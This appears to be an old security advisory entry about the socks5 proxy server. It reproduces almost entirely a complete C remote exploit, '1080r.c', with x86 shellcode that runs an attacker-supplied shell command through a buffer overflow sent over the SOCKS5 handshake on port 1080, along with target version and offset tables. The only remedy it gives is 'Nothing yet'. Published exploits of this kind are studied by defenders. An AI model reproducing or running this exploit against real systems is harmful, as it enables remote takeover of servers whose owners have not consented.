COMMAND
socks5
SYSTEMS AFFECTED
socks5
PROBLEM
'0days master' posted following.
/*
* !!!! Private do not distribute !!!!
*
* <1080r.c> socks5 remote exploit / linux x86
*
* Usage:
* $ ./1080r <host> <command> [offset]
*
* Vulnerables:
* socks5-v1.0r10 (compiled on a turbolinux 4.0.5) => 0
* socks5-v1.0r9 (compiled on a turbolinux 4.0.5) => 0
* socks5-v1.0r8 (compiled on a turbolinux 4.0.5) => 0
* socks5-v1.0r10 (compiled on a redhat 6.0) => 400
* socks5-s5watch-1.0r9-2 (redhat-contrib) => no?
* socks5-0.17-1 (redhat 4.2) => no
* socks5-1.0r10-5 (redhat-contrib) => no??
* socks5-server-1.0r6-8TL (TurboContrib) => no??
*
* By: The Dark Raver of CPNE (Spain - 9/5/2000)
*
* <http://members.tripod.com/~ochodedos> - <doble@iname.com>
*
* "Pasaba arrolladora en su hermosura
* y el paso le dejé,
* ni aun mirarla me volví, y no obstante
* algo en mi oído murmuró, esa es..."
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#define NOP 0x90
#define MAXLEN 2000
#define OFFSET 0x7fffd99d // TurboLinux 4.0.5
#define ALIGN 3
#define LENGTH 195
char hell[100]=
"\xeb\x29" // jmp 0x13
"\x5e" // popl %esi
"\x89\x76\x30" // movl %esi,0x30(%esi)
"\x89\xf0" // movl %esi,%eax
"\x83\xc0\x08" // addl $0x8,%eax
"\x89\x46\x34" // movl %eax,0x34(%esi)
"\x83\xc0\x03" // addl $0x3,%eax
"\x89\x46\x38" // movl %eax,0x38(%esi)
"\x31\xc0" // xorl %eax,%eax
"\x89\x46\x3c" // movl %eax,0x3c(%esi)
"\x88\x46\x07" // movb %eax,0x7(%esi)
"\x88\x46\x0a" // movb %eax,0xa(%esi)
"\xb0\x0b" // movb $0xb,%al
"\x89\xf3" // movl %esi,%ebx
"\x8d\x4e\x30" // leal 0x30(%esi),%ecx
"\x8d\x56\x3c" // leal 0x3c(%esi),%edx
"\xcd\x80" // int $0x80
"\xe8\xd2\xff\xff\xff" // call -0x22
"/bin/shA"
"-cA"
"";
char buf[MAXLEN];
main(int argc, char *argv[]) {
struct sockaddr_in to;
char buff[1000];
int sd;
int pktlen;
struct hostent *hp;
int i;
long *addr;
int off;
int alin;
int len;
int offset;
if(argc==4) {
offset=atoi(argv[3]);
} else {
if(argc==3) {
offset=0;
} else {
printf("Uso: ./1080r <host> <command> [offset]\n");
exit(0); }
}
len=LENGTH;
off=OFFSET+offset;
alin=ALIGN;
strcat(hell,argv[2]);
strcat(hell,";");
memset(buf,NOP,len);
memcpy(buf+len-strlen(hell)-4,hell,strlen(hell));
addr=(long *)(buf+alin);
for (i=0;i<46;i+=4)
*(addr++) = off;
buf[len-1]='\0';
to.sin_family=AF_INET;
to.sin_port = htons(1080);
if((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) {
perror("gethostbyname()");
exit(0); }
if((sd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("socket()");
exit(0); }
memcpy((char *)&to.sin_addr,(char *)hp->h_addr,hp->h_length);
if(connect(sd,(struct sockaddr *)&to,sizeof(to))!=0) {
perror("connect()");
exit(0); }
printf("Connect: Ready to send overflow...\n");
//getchar();
// inicio
pktlen=3;
buff[0]=0x5; // SOCKS version 5
buff[1]=0x1; // one authentication type...
buff[2]=0x0; // no authentication
//buff[2]=0x2; // userpass
if(write(sd, buff, pktlen)!=pktlen) {
perror("write error");
exit(-1); }
if(read(sd, buff, 2)!=2) {
perror("read error");
exit(-1); }
if(buff[0] != 0x5) {
printf("invalid response\n");
exit(-1); }
if(buff[1] == 0xf) {
printf("proxy requires authenticationn");
exit(-1); }
if(buff[1] != 0x0) {
printf("proxy returned an invalid authentication type\n");
exit(-1); }
// autentificacion
/*
printf("done\n");
printf("sending autentificacion request...");
pktlen=snprintf(buff, sizeof(buff), "\x01%c%s%c%s",
strlen(username), username, strlen(password), password);
send(sd, buff, pktlen, 0);
recv(sd, buff, 2, 0);
if(buff[1] != 0x00) {
printf("username/password invalid\n");
exit (1); }
*/
// conexion
for(i=1;i<=len;i++)
putchar(buf[i]);
printf("done\n");
printf("sending connection request...");
pktlen=snprintf(buff, sizeof(buff), "\x05\x01%c\x03%c%s%c%c",
0x00, strlen(buf), buf, 0x11, 0x22);
if(write(sd, buff, pktlen)!=pktlen) {
perror("write error");
exit(-1); }
if(read(sd, buff, 4)!=4) {
perror("read error (1)");
exit(-1); }
switch(buff[1]) {
case 0: printf("succeeded\n"); break;
case 1: printf("general SOCKS server failure\n"); exit(-1);
case 2: printf("connection not allowed by ruleset\n"); exit(-1);
case 3: printf("network unreachable\n"); exit(-1);
case 4: printf("host unreachable\n"); exit(-1);
case 5: printf("connection refused\n"); exit(-1);
case 6: printf("TTL expired\n"); exit(-1);
case 7: printf("command not supported (?)\n"); exit(-1);
case 8: printf("address type not supported\n"); exit(-1);
default: printf("returned unknown error code\n"); exit(-1);
}
}
SOLUTION
Nothing yet.